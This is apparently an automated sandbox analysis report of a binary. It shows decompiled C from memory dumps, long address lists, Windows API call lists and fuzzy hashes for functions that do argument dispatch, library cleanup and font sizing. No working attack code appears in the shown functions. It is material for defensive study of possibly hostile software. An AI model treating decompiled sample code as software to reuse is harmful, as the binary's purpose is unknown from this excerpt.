										__eax =  *(__ebp - 0x3c);
										 *__ecx =  *(__ebp - 0x3c);
										goto L79;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L79;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L79;
									case 4:
										__ecx =  *(__ebp + 0x14);
										__eax =  *(__ebp - 0x3c);
										 *__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp - 0x38);
										 *(__ecx + 4) =  *(__ebp - 0x38);
										goto L79;
									case 5:
										__eax = E0127EE2B(__eax,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L79;
									case 6:
										__eax =  *(__ebp + 0x14);
										__ecx = 0;
										__eflags =  *(__ebp - 0x3c) - __cx;
										__ecx = 0 |  *(__ebp - 0x3c) != __cx;
										 *( *(__ebp + 0x14)) = __ecx;
										goto L79;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L79;
									case 8:
										goto L79;
									case 9:
										 *( *(_t279 + 0x14)) =  *((intOrPtr*)(_t279 - 0x3c));
										goto L79;
								}
							}
							_t175 = _t279 - 0x44;
							__imp__#12(_t175, _t175, _t231, _t275);
							_t271 = _t175;
							__eflags = _t271;
							if(__eflags >= 0) {
								goto L68;
							}
							__imp__#9(_t279 - 0x44);
							L42:
							_push(_t271);
							E01269439(_t231, _t271, _t275, _t301);
							L43:
							_t231 =  &(_t231[2]);
							 *(_t279 + 0x1c) = _t237 + 4;
							_t242 = _t279 - 0x18;
							_t275 =  *_t231;
							_t178 = E012633C1(_t231, _t279 - 0x18, _t271, _t275, _t301);
							 *((char*)(_t279 - 4)) = 2;
							__imp__#2( *((intOrPtr*)(_t279 - 0x18)), _t275);
							 *_t271 = _t178;
							if(_t275 == 0 || _t178 != 0) {
								_t276 = 8;
								 *((char*)(_t279 - 4)) = 1;
								 *( *(_t279 - 0x10)) = _t276;
								E012615E0( *((intOrPtr*)(_t279 - 0x18)) - 0x10, _t261);
								L26:
								_t262 =  *(_t279 - 0x10);
								L27:
								_t245 =  *(_t279 + 0x1c);
								L28:
								_t181 = 0x10;
								_t262 = _t262 - _t181;
								_t271 = _t271 - _t181;
								_t183 =  &(( *(_t279 - 0x14))[1]);
								 *(_t279 - 0x10) = _t262;
								 *(_t279 - 0x1c) = _t271;
								 *(_t279 - 0x14) = _t183;
								if( *_t183 != 0) {
									L9:
									_t184 =  *_t183 & 0x000000ff;
									 *_t262 = _t184;
									if((_t184 & 0x00000040) != 0) {
										 *_t262 = _t184 & 0x0000ffbf | 0x00004000;
									}
									_t185 =  *_t262 & 0x0000ffff;
									_t290 = _t185 - 0x4002;
									if(_t290 > 0) {
										_t186 = _t185 - 0x4003;
										__eflags = _t186 - 0x12;
										if(__eflags > 0) {
											goto L28;
										}
										switch( *((intOrPtr*)(_t186 * 4 +  &M012815CC))) {
											case 0:
												goto L18;
											case 1:
												_t231 =  &(_t231[2]);
												 *(_t279 + 0x1c) = _t245 + 4;
												_t247 =  *_t231;
												 *(_t279 - 0x34) = _t247;
												 *(_t279 - 0x30) = _t247;
												asm("sbb eax, eax");
												 *(_t279 - 0x2c) =  *(_t279 - 0x2c) & 0x00000000;
												 *_t247 =  ~( *_t247) & 0x0000ffff;
												 *_t271 = _t247;
												 *((char*)(_t279 - 4)) = 3;
												_push(_t279 - 0x34);
												E01280D95(_t231, _t279 - 0x68, _t271, _t276,  *((intOrPtr*)(_t279 - 0x60)));
												__eflags =  *(_t279 - 0x2c);
												 *((char*)(_t279 - 4)) = 1;
												if(__eflags != 0) {
													E01262C9F( *(_t279 - 0x34));
												}
												goto L26;
											case 2:
												goto L28;
										}
									} else {
										if(_t290 == 0) {
											L18:
											_t245 = _t245 + 4;
											_t231 =  &(_t231[2]);
											 *_t271 =  *_t231;
											goto L28;
										}
										_t194 = _t185 - 2;
										if(_t194 > 0x13) {
											goto L28;
										}
										switch( *((intOrPtr*)(_t194 * 4 +  &M0128157C))) {
											case 0:
												__ecx = __ecx + 4;
												__ebx = __ebx + 4;
												__eflags = __ebx;
												__ax =  *__ebx;
												goto L17;
											case 1:
												goto L18;
											case 2:
												__ecx = __ecx + __esi;
												__ebx = __ebx + __esi;
												 *__edi =  *__ecx;
												goto L28;
											case 3:
												__ecx = __ecx + __esi;
												__ebx = __ebx + __esi;
												 *__edi =  *__ecx;
												goto L28;
											case 4:
												__ecx = __ecx + 4;
												__ebx = __ebx + 4;
												 *(__ebp + 0x1c) = __ecx;
												__ecx =  *__ebx;
												__eax =  *__ecx;
												 *__edi =  *__ecx;
												_t44 = __ecx + 4; // 0x984d8df8
												__eax =  *_t44;
												__edi[1] = __eax;
												goto L27;
											case 5:
												__ebx = __ebx + 4;
												__ecx = __ecx + 4;
												 *(__ebp + 0x1c) = __ecx;
												__esi =  *__ebx;
												_push(__esi);
												__imp__#2();
												 *__edi = __eax;
												__eflags = __esi;
												if(__eflags == 0) {
													L25:
													_push(8);
													_pop(__esi);
													goto L26;
												}
												__eflags = __eax;
												if(__eflags == 0) {
													goto L52;
												}
												goto L25;
											case 6:
												__ebx = __ebx + 4;
												__ecx = __ecx + 4;
												__eax =  *__ebx;
												__eax =  ~( *__ebx);
												asm("sbb eax, eax");
												L17:
												 *__edi = __ax;
												goto L28;
											case 7:
												__ecx = __ecx + 4;
												__edi = __edx;
												__ebx = __ebx + 4;
												_push(8);
												__esi =  *__ebx;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												__edi =  *(__ebp - 0x1c);
												_pop(__esi);
												goto L28;
											case 8:
												goto L43;
											case 9:
												goto L28;
											case 0xa:
												_t245 = _t245 + 4;
												_t231 =  &(_t231[2]);
												 *_t271 =  *_t231;
												goto L28;
											case 0xb:
												__ecx = __ecx + __esi;
												__ebx = __ebx + __esi;
												__eax =  *__ecx;
												 *__edi =  *__ecx;
												__eax =  *(__ecx + 4);
												__edi[1] = __eax;
												goto L28;
										}
									}
								}
								_t231 = 0;
								goto L30;
							} else {
								L52:
								E0126828F(_t242);
								L53:
								_t199 =  *(_t279 - 0x70);
								__eflags = _t199;
								if(__eflags != 0) {
									 *_t199(_t279 - 0x88);
								}
								_t200 = E01262C72(__eflags, 0x20);
								_pop(_t237);
								 *(_t279 + 0x14) = _t200;
								 *((char*)(_t279 - 4)) = 4;
								__eflags = _t200;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t279 - 0x88)));
									_t237 = _t200;
									_push(_t231);
									_push(_t231);
									_t231 = E012802A6(_t231, _t237, _t271, _t275, __eflags);
								}
								_t275 = __imp__#7;
								 *((char*)(_t279 - 4)) = 1;
								_t201 =  *_t275( *((intOrPtr*)(_t279 - 0x84)));
								__eflags = _t201;
								if(_t201 != 0) {
									_t109 =  &(_t231[0xc]); // 0x18
									_t237 = _t109;
									E012693C6(_t237,  *((intOrPtr*)(_t279 - 0x84)));
								}
								_t271 = __imp__#6;
								 *_t271( *((intOrPtr*)(_t279 - 0x84)));
								_t203 =  *_t275( *((intOrPtr*)(_t279 - 0x80)));
								__eflags = _t203;
								if(_t203 != 0) {
									_t113 =  &(_t231[6]); // 0xc
									_t237 = _t113;
									E012693C6(_t237,  *((intOrPtr*)(_t279 - 0x80)));
								}
								 *_t271( *((intOrPtr*)(_t279 - 0x80)));
								_t205 =  *_t275( *((intOrPtr*)(_t279 - 0x7c)));
								__eflags = _t205;
								if(_t205 != 0) {
									_t117 =  &(_t231[0xa]); // 0x14
									_t237 = _t117;
									E012693C6(_t237,  *((intOrPtr*)(_t279 - 0x7c)));
								}
								 *_t271( *((intOrPtr*)(_t279 - 0x7c)));
								_t231[8] =  *(_t279 - 0x78);
								_t231[0xe] =  *(_t279 - 0x6c);
								 *(_t279 + 0x14) = _t231;
								E012864EA(_t279 + 0x14, 0x12a7180);
								goto L64;
							}
						}
						__imp__#9(_t279 - 0x44);
						_t301 = _t271 - 0x80020009;
						if(_t271 == 0x80020009) {
							goto L53;
						}
						goto L42;
					} else {
						 *(_t279 + 0xc) =  *(_t279 - 0x54) + 0xfffffff0 + (_t236 << 4);
						_t220 =  *(_t279 + 0x18);
						if( *_t220 == 0) {
							goto L40;
						}
						_t277 =  *(_t279 + 0xc);
						_t272 = _t220;
						do {
							_t221 =  *_t272;
							if(_t221 == 8 || _t221 == 0xe) {
								__imp__#9(_t277);
							}
							_t222 = 0x10;
							_t277 = _t277 - _t222;
							_t272 =  &(_t272[1]);
						} while ( *_t272 != 0);
						_t275 =  *(_t279 + 0x10);
						_t271 =  *(_t279 + 0x1c);
						goto L40;
					}
				}
				_t263 = 0x10;
				_t278 = E01262C72(_t286,  ~(0 | _t286 > 0x00000000) | _t274 * _t263);
				 *(_t279 - 0x54) = _t278;
				E01283870(_t278, _t231,  *(_t279 - 0x4c) << 4);
				_t281 = _t281 + 0x10;
				 *(_t279 - 0x14) = _t269;
				_t262 = ( *(_t279 - 0x4c) << 4) + 0xfffffff0 + _t278;
				 *(_t279 - 0x10) = _t262;
				if( *_t269 == 0) {
					goto L30;
				}
				_t227 =  *(_t279 + 0x1c);
				_t271 =  &(_t262[4]);
				 *(_t279 - 0x1c) = _t271;
				_t276 = 8;
				_t34 = _t227 - 4; // 0x1281293
				_t231 = _t34;
				_t35 = _t227 - 8; // 0x128128f
				_t245 = _t35;
				_t183 =  *(_t279 - 0x14);
				goto L9;
			}









































                                                                                                                0x01281078
                                                                                                                0x0128107f
                                                                                                                0x01281084
                                                                                                                0x01281086
                                                                                                                0x01281089
                                                                                                                0x0128108d
                                                                                                                0x01281571
                                                                                                                0x01281576
                                                                                                                0x01281576
                                                                                                                0x01281093
                                                                                                                0x01281096
                                                                                                                0x01281099
                                                                                                                0x0128109c
                                                                                                                0x012810a1
                                                                                                                0x012810a6
                                                                                                                0x012810ab
                                                                                                                0x012810b0
                                                                                                                0x012810b3
                                                                                                                0x012810b8
                                                                                                                0x012810c8
                                                                                                                0x012810ba
                                                                                                                0x012810c0
                                                                                                                0x012810c3
                                                                                                                0x012810c3
                                                                                                                0x012810cf
                                                                                                                0x012810d6
                                                                                                                0x012810db
                                                                                                                0x012810e2
                                                                                                                0x012810e2
                                                                                                                0x012810e8
                                                                                                                0x012810ed
                                                                                                                0x012810f1
                                                                                                                0x012810f3
                                                                                                                0x01281237
                                                                                                                0x0128123a
                                                                                                                0x0128123d
                                                                                                                0x01281242
                                                                                                                0x01281248
                                                                                                                0x0128124a
                                                                                                                0x0128124a
                                                                                                                0x01281257
                                                                                                                0x01281262
                                                                                                                0x01281266
                                                                                                                0x01281275
                                                                                                                0x0128128a
                                                                                                                0x0128128f
                                                                                                                0x01281292
                                                                                                                0x01281297
                                                                                                                0x0128129c
                                                                                                                0x012812db
                                                                                                                0x012812de
                                                                                                                0x012812e3
                                                                                                                0x012812e6
                                                                                                                0x012812e9
                                                                                                                0x012814a3
                                                                                                                0x012814a3
                                                                                                                0x012814a6
                                                                                                                0x0128155a
                                                                                                                0x0128155d
                                                                                                                0x01281562
                                                                                                                0x01281566
                                                                                                                0x0128156b
                                                                                                                0x01281570
                                                                                                                0x00000000
                                                                                                                0x01281566
                                                                                                                0x012814ac
                                                                                                                0x012814b0
                                                                                                                0x012814d4
                                                                                                                0x012814d7
                                                                                                                0x012814da
                                                                                                                0x012814dd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012814df
                                                                                                                0x00000000
                                                                                                                0x012814f0
                                                                                                                0x012814f3
                                                                                                                0x012814f7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281552
                                                                                                                0x01281555
                                                                                                                0x01281558
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0128150c
                                                                                                                0x01281512
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281516
                                                                                                                0x0128151c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012814fc
                                                                                                                0x012814ff
                                                                                                                0x01281502
                                                                                                                0x01281504
                                                                                                                0x01281507
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281526
                                                                                                                0x0128152b
                                                                                                                0x0128152e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281536
                                                                                                                0x01281539
                                                                                                                0x0128153b
                                                                                                                0x0128153f
                                                                                                                0x01281542
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281546
                                                                                                                0x01281549
                                                                                                                0x0128154c
                                                                                                                0x0128154d
                                                                                                                0x0128154e
                                                                                                                0x0128154f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012814ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012814df
                                                                                                                0x012814b4
                                                                                                                0x012814b9
                                                                                                                0x012814bf
                                                                                                                0x012814c1
                                                                                                                0x012814c3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012814c9
                                                                                                                0x01281305
                                                                                                                0x01281305
                                                                                                                0x01281306
                                                                                                                0x0128130b
                                                                                                                0x0128130b
                                                                                                                0x01281311
                                                                                                                0x01281314
                                                                                                                0x01281317
                                                                                                                0x0128131a
                                                                                                                0x01281322
                                                                                                                0x01281326
                                                                                                                0x0128132c
                                                                                                                0x01281330
                                                                                                                0x01281342
                                                                                                                0x01281346
                                                                                                                0x0128134a
                                                                                                                0x0128134d
                                                                                                                0x01281212
                                                                                                                0x01281212
                                                                                                                0x01281215
                                                                                                                0x01281215
                                                                                                                0x01281218
                                                                                                                0x0128121a
                                                                                                                0x0128121b
                                                                                                                0x0128121d
                                                                                                                0x01281222
                                                                                                                0x01281223
                                                                                                                0x01281226
                                                                                                                0x01281229
                                                                                                                0x0128122f
                                                                                                                0x01281154
                                                                                                                0x01281154
                                                                                                                0x01281157
                                                                                                                0x0128115c
                                                                                                                0x01281168
                                                                                                                0x01281168
                                                                                                                0x0128116b
                                                                                                                0x0128116e
                                                                                                                0x01281173
                                                                                                                0x01281381
                                                                                                                0x01281386
                                                                                                                0x01281389
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0128138f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281396
                                                                                                                0x0128139c
                                                                                                                0x0128139f
                                                                                                                0x012813a1
                                                                                                                0x012813a4
                                                                                                                0x012813ab
                                                                                                                0x012813ad
                                                                                                                0x012813b6
                                                                                                                0x012813b8
                                                                                                                0x012813bd
                                                                                                                0x012813c1
                                                                                                                0x012813c8
                                                                                                                0x012813cd
                                                                                                                0x012813d1
                                                                                                                0x012813d5
                                                                                                                0x012813de
                                                                                                                0x012813e3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281179
                                                                                                                0x01281179
                                                                                                                0x012811a8
                                                                                                                0x012811a8
                                                                                                                0x012811ab
                                                                                                                0x012811b0
                                                                                                                0x00000000
                                                                                                                0x012811b0
                                                                                                                0x0128117b
                                                                                                                0x01281181
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281187
                                                                                                                0x00000000
                                                                                                                0x0128119a
                                                                                                                0x0128119d
                                                                                                                0x0128119d
                                                                                                                0x012811a0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012811c4
                                                                                                                0x012811c6
                                                                                                                0x012811ca
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012811ce
                                                                                                                0x012811d0
                                                                                                                0x012811d4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012811d8
                                                                                                                0x012811db
                                                                                                                0x012811de
                                                                                                                0x012811e1
                                                                                                                0x012811e3
                                                                                                                0x012811e5
                                                                                                                0x012811e7
                                                                                                                0x012811e7
                                                                                                                0x012811ea
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012811ef
                                                                                                                0x012811f2
                                                                                                                0x012811f5
                                                                                                                0x012811f8
                                                                                                                0x012811fa
                                                                                                                0x012811fb
                                                                                                                0x01281201
                                                                                                                0x01281203
                                                                                                                0x01281205
                                                                                                                0x0128120f
                                                                                                                0x0128120f
                                                                                                                0x01281211
                                                                                                                0x00000000
                                                                                                                0x01281211
                                                                                                                0x01281207
                                                                                                                0x01281209
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281357
                                                                                                                0x0128135a
                                                                                                                0x0128135d
                                                                                                                0x0128135f
                                                                                                                0x01281361
                                                                                                                0x012811a3
                                                                                                                0x012811a3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281368
                                                                                                                0x0128136b
                                                                                                                0x0128136d
                                                                                                                0x01281370
                                                                                                                0x01281372
                                                                                                                0x01281374
                                                                                                                0x01281375
                                                                                                                0x01281376
                                                                                                                0x01281377
                                                                                                                0x01281378
                                                                                                                0x0128137b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0128118e
                                                                                                                0x01281191
                                                                                                                0x01281196
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012811b4
                                                                                                                0x012811b6
                                                                                                                0x012811b8
                                                                                                                0x012811ba
                                                                                                                0x012811bc
                                                                                                                0x012811bf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01281187
                                                                                                                0x01281173
                                                                                                                0x01281235
                                                                                                                0x00000000
                                                                                                                0x012813e9
                                                                                                                0x012813e9
                                                                                                                0x012813e9
                                                                                                                0x012813ee
                                                                                                                0x012813ee
                                                                                                                0x012813f1
                                                                                                                0x012813f3
                                                                                                                0x012813fc
                                                                                                                0x012813fc
                                                                                                                0x01281400
                                                                                                                0x01281405
                                                                                                                0x01281406
                                                                                                                0x01281409
                                                                                                                0x0128140d
                                                                                                                0x0128140f
                                                                                                                0x01281411
                                                                                                                0x01281417
                                                                                                                0x01281419
                                                                                                                0x0128141a
                                                                                                                0x01281420
                                                                                                                0x01281420
                                                                                                                0x01281428
                                                                                                                0x0128142e
                                                                                                                0x01281432
                                                                                                                0x01281434
                                                                                                                0x01281436
                                                                                                                0x0128143e
                                                                                                                0x0128143e
                                                                                                                0x01281441
                                                                                                                0x01281441
                                                                                                                0x0128144c
                                                                                                                0x01281452
                                                                                                                0x01281457
                                                                                                                0x01281459
                                                                                                                0x0128145b
                                                                                                                0x01281460
                                                                                                                0x01281460
                                                                                                                0x01281463
                                                                                                                0x01281463
                                                                                                                0x0128146b
                                                                                                                0x01281470
                                                                                                                0x01281472
                                                                                                                0x01281474
                                                                                                                0x01281479
                                                                                                                0x01281479
                                                                                                                0x0128147c
                                                                                                                0x0128147c
                                                                                                                0x01281484
                                                                                                                0x01281489
                                                                                                                0x0128148f
                                                                                                                0x0128149b
                                                                                                                0x0128149e
                                                                                                                0x00000000
                                                                                                                0x0128149e
                                                                                                                0x01281330
                                                                                                                0x012812f3
                                                                                                                0x012812f9
                                                                                                                0x012812ff
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0128129e
                                                                                                                0x012812a9
                                                                                                                0x012812ac
                                                                                                                0x012812b2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012812b4
                                                                                                                0x012812b7
                                                                                                                0x012812b9
                                                                                                                0x012812b9
                                                                                                                0x012812bd
                                                                                                                0x012812c4
                                                                                                                0x012812c4
                                                                                                                0x012812cc
                                                                                                                0x012812cd
                                                                                                                0x012812cf
                                                                                                                0x012812d0
                                                                                                                0x012812d5
                                                                                                                0x012812d8
                                                                                                                0x00000000
                                                                                                                0x012812d8
                                                                                                                0x0128129c
                                                                                                                0x012810ff
                                                                                                                0x01281112
                                                                                                                0x0128111a
                                                                                                                0x0128111d
                                                                                                                0x01281125
                                                                                                                0x0128112e
                                                                                                                0x01281131
                                                                                                                0x01281136
                                                                                                                0x01281139
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0128113f
                                                                                                                0x01281142
                                                                                                                0x01281147
                                                                                                                0x0128114a
                                                                                                                0x0128114b
                                                                                                                0x0128114b
                                                                                                                0x0128114e
                                                                                                                0x0128114e
                                                                                                                0x01281151
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memset$ClearVariant$AllocH_prolog3String_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3760123796-0
                                                                                                                • Opcode ID: 9ddd6f6161b6b0d89a04ea2fcf14635443fc12f08f09dc42d28b848c385126ba
                                                                                                                • Instruction ID: 7b7b25d8e51d5ee73470c589bb9644e27b6c5788203f0a3101b095454fea3f01
                                                                                                                • Opcode Fuzzy Hash: 9ddd6f6161b6b0d89a04ea2fcf14635443fc12f08f09dc42d28b848c385126ba
                                                                                                                • Instruction Fuzzy Hash: BCD19CB1D2121ADFEF05DFA8D8906ADBBB0FF19304F144069E912AB3D4D774A962CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012624D0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 76librarymemoryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E012624D0(void* __ecx, void* __edi) {
				_Unknown_base(*)()* _t14;
				void* _t15;
				void* _t19;
				intOrPtr _t22;
				_Unknown_base(*)()* _t28;
				void* _t30;
				void* _t31;
				signed int _t32;
				void* _t34;

				_t31 = __edi;
				_t34 = __ecx;
				_t14 = GetProcAddress(LoadLibraryA("KERNEL32.dll"), "FreeLibrary");
				_t28 = _t14;
				if(_t34 != 0) {
					if( *(_t34 + 0x10) != 0) {
						_t30 =  *(_t34 + 4);
						 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x28)) + _t30))(_t30, 0, 0);
						 *(_t34 + 0x10) = 0;
					}
					if( *((intOrPtr*)(_t34 + 8)) == 0) {
						L11:
						_t15 =  *(_t34 + 4);
						if(_t15 != 0) {
							VirtualFree(_t15, 0, 0x8000);
						}
						return HeapFree(GetProcessHeap(), 0, _t34);
					} else {
						_push(_t31);
						_t32 = 0;
						if( *((intOrPtr*)(_t34 + 0xc)) <= 0) {
							L8:
							_t19 = 0xa;
							do {
								0;
								_t19 = _t19 - 1;
							} while (_t19 != 0);
							E012833F4( *((intOrPtr*)(_t34 + 8)));
							goto L11;
						} else {
							goto L5;
						}
						do {
							L5:
							_t22 =  *((intOrPtr*)( *((intOrPtr*)(_t34 + 8)) + _t32 * 4));
							if(_t22 != 0xffffffff) {
								 *_t28(_t22);
							}
							_t32 = _t32 + 1;
						} while (_t32 <  *((intOrPtr*)(_t34 + 0xc)));
						goto L8;
					}
				}
				return _t14;
			}












                                                                                                                0x012624d0
                                                                                                                0x012624dc
                                                                                                                0x012624e5
                                                                                                                0x012624eb
                                                                                                                0x012624ef
                                                                                                                0x012624f9
                                                                                                                0x012624fd
                                                                                                                0x0126250a
                                                                                                                0x0126250c
                                                                                                                0x0126250c
                                                                                                                0x01262517
                                                                                                                0x0126255e
                                                                                                                0x0126255e
                                                                                                                0x01262563
                                                                                                                0x0126256d
                                                                                                                0x0126256d
                                                                                                                0x00000000
                                                                                                                0x01262519
                                                                                                                0x01262519
                                                                                                                0x0126251a
                                                                                                                0x0126251f
                                                                                                                0x01262535
                                                                                                                0x01262535
                                                                                                                0x01262540
                                                                                                                0x01262546
                                                                                                                0x0126254a
                                                                                                                0x0126254a
                                                                                                                0x01262556
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01262521
                                                                                                                0x01262521
                                                                                                                0x01262524
                                                                                                                0x0126252a
                                                                                                                0x0126252d
                                                                                                                0x0126252d
                                                                                                                0x0126252f
                                                                                                                0x01262530
                                                                                                                0x00000000
                                                                                                                0x01262521
                                                                                                                0x01262517
                                                                                                                0x01262585

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(KERNEL32.dll,FreeLibrary,?,012AB8F0,01262411,?,00000000), ref: 012624DE
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 012624E5
                                                                                                                • _free.LIBCMT ref: 01262556
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0126256D
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 01262576
                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 0126257D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap$AddressLibraryLoadProcProcessVirtual_free
                                                                                                                • String ID: FreeLibrary$KERNEL32.dll
                                                                                                                • API String ID: 3119015572-1121657293
                                                                                                                • Opcode ID: c65364e4214fd58a5d2a2caeaf00d2173cf3142aac9460bea4608d616551e113
                                                                                                                • Instruction ID: 475a12b5b6fbb6e4a788f8d5705b5b378d1a4947deb0c7eda9946c083bcfaa8b
                                                                                                                • Opcode Fuzzy Hash: c65364e4214fd58a5d2a2caeaf00d2173cf3142aac9460bea4608d616551e113
                                                                                                                • Instruction Fuzzy Hash: F211BC71650702EBEB389B6CFC59B577BA8BB04721F000918E25B972D0C7B5E481CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127E19A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E0127E19A(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t11;
				void* _t13;
				struct HDC__* _t18;
				char* _t22;
				signed int _t28;
				void* _t30;
				signed short _t31;
				struct HDC__* _t32;
				signed int _t33;

				_t11 =  *0x12aa3f0; // 0xddd5d539
				_v8 = _t11 ^ _t33;
				_t32 = GetStockObject;
				_t22 = "System";
				_t31 = 0xa;
				_v72 = __ecx;
				_t13 = GetStockObject(0x11);
				if(_t13 != 0) {
					L2:
					if(GetObjectA(_t13, 0x3c,  &_v68) != 0) {
						_t22 =  &_v40;
						_t18 = GetDC(0);
						_t28 = _v68;
						_t32 = _t18;
						if(_t28 < 0) {
							_v68 =  ~_t28;
						}
						_t31 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t32);
					}
					L6:
					_t15 = _a4;
					if(_a4 == 0) {
						_t15 = _t31 & 0x0000ffff;
					}
					E0127E026(_t22, _v72, _t30, _t32, _t22, _t15);
					return E012833E5(_t22, _v8 ^ _t33, _t30, _t31, _t32);
				}
				_t13 = GetStockObject(0xd);
				if(_t13 == 0) {
					goto L6;
				}
				goto L2;
			}



















                                                                                                                0x0127e1a0
                                                                                                                0x0127e1a7
                                                                                                                0x0127e1ac
                                                                                                                0x0127e1b2
                                                                                                                0x0127e1ba
                                                                                                                0x0127e1bd
                                                                                                                0x0127e1c0
                                                                                                                0x0127e1c4
                                                                                                                0x0127e1ce
                                                                                                                0x0127e1dd
                                                                                                                0x0127e1e1
                                                                                                                0x0127e1e4
                                                                                                                0x0127e1ea
                                                                                                                0x0127e1ed
                                                                                                                0x0127e1f1
                                                                                                                0x0127e1f5
                                                                                                                0x0127e1f5
                                                                                                                0x0127e210
                                                                                                                0x0127e213
                                                                                                                0x0127e213
                                                                                                                0x0127e219
                                                                                                                0x0127e219
                                                                                                                0x0127e21f
                                                                                                                0x0127e221
                                                                                                                0x0127e221
                                                                                                                0x0127e229
                                                                                                                0x0127e23e
                                                                                                                0x0127e23e
                                                                                                                0x0127e1c8
                                                                                                                0x0127e1cc
                                                                                                                0x00000000
                                                                                                                0x00000000
